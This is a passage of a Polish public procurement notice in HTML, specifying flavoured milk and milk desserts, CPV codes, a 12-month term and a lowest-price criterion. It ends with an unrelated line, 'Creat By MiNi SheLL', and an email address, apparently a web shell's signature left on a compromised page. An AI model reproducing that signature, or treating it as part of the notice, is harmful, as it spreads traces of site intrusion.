dopuszcza się podstoju śmietanki; smak i zapach: właściwy dla mleka pasteryzowanego, o posmaku odpowiednich dodatków smakowo-zapachowych; zawartość tłuszczu 2%; opakowanie jednostkowe: pudełko kartonowe z laminatu wielowarstwowego o pojemności ok. 250 ml. Termin przydatności do spożycia : nie krótszy niż 30 dni od daty dostawy.	litr	100  23.	Deser mleczny	15512000-0
PN-A-86061:2002; masa ok. 150 g, z kaszą manną lub ryżem o różnych  smakach; smak i zapach: czysty, łagodny, słodko-kwaśny, smakowo właściwy dla zawartego składnika; opakowanie jednostkowe: kubek z tworzywa sztucznego. Termin przydatności do spożycia: nie krótszy niż 14 dni od daty dostawy.	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.55.13.20-4, 15.51.10.00-3, 15.54.22.00-1, 15.54.40.00-3, 15.51.20.00-0, 15.54.21.00-0, 15.53.00.00-2, 15.51.29.00-9, 15.54.23.00-2, 15.55.13.10-1, 15.54.20.00-9, 15.51.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com